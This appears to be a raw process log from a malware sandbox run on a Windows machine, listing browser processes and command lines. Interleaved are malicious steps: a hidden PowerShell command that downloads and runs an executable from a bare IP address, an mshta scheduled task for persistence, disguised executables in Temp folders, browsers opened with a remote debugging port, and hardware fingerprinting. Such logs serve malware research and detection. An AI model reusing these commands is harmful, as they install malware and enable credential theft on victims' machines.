"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3496 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3360 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1948 /prefetch:2

C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2704 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10096480101\441ede6b27.exe

"C:\Users\Admin\AppData\Local\Temp\10096480101\441ede6b27.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2712 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2996 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2724 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn RqPYvmahlJo /tr "mshta C:\Users\Admin\AppData\Local\Temp\2kB7ed3sQ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\2kB7ed3sQ.hta

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3860 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4316 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1932 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn RqPYvmahlJo /tr "mshta C:\Users\Admin\AppData\Local\Temp\2kB7ed3sQ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'C9AZU4WYL0MBXVPLLL3K9WWMEGYOTGDK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\2C27.tmp.exe

C:\Users\Admin\AppData\Local\Temp\2C27.tmp.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10096490121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe

"C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe"

C:\Users\Admin\AppData\Local\TempC9AZU4WYL0MBXVPLLL3K9WWMEGYOTGDK.EXE

"C:\Users\Admin\AppData\Local\TempC9AZU4WYL0MBXVPLLL3K9WWMEGYOTGDK.EXE"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff85403cc40,0x7ff85403cc4c,0x7ff85403cc58

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2360,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2356 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1920,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2392 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10096980101\bPDDW9F.exe

"C:\Users\Admin\AppData\Local\Temp\10096980101\bPDDW9F.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4684,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe

"C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3148,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4284 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\temp_22486.exe

"C:\Users\Admin\AppData\Local\Temp\temp_22486.exe"

C:\Users\Admin\AppData\Local\Temp\temp_22486.exe

"C:\Users\Admin\AppData\Local\Temp\temp_22486.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Users\Admin\AppData\Local\Temp\temp_22506.exe

"C:\Users\Admin\AppData\Local\Temp\temp_22506.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2932 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3952 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2936 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4004 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2948 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3020 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10096990101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10096990101\z3SJkC5.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff85403cc40,0x7ff85403cc4c,0x7ff85403cc58

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic cpu get ProcessorId"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

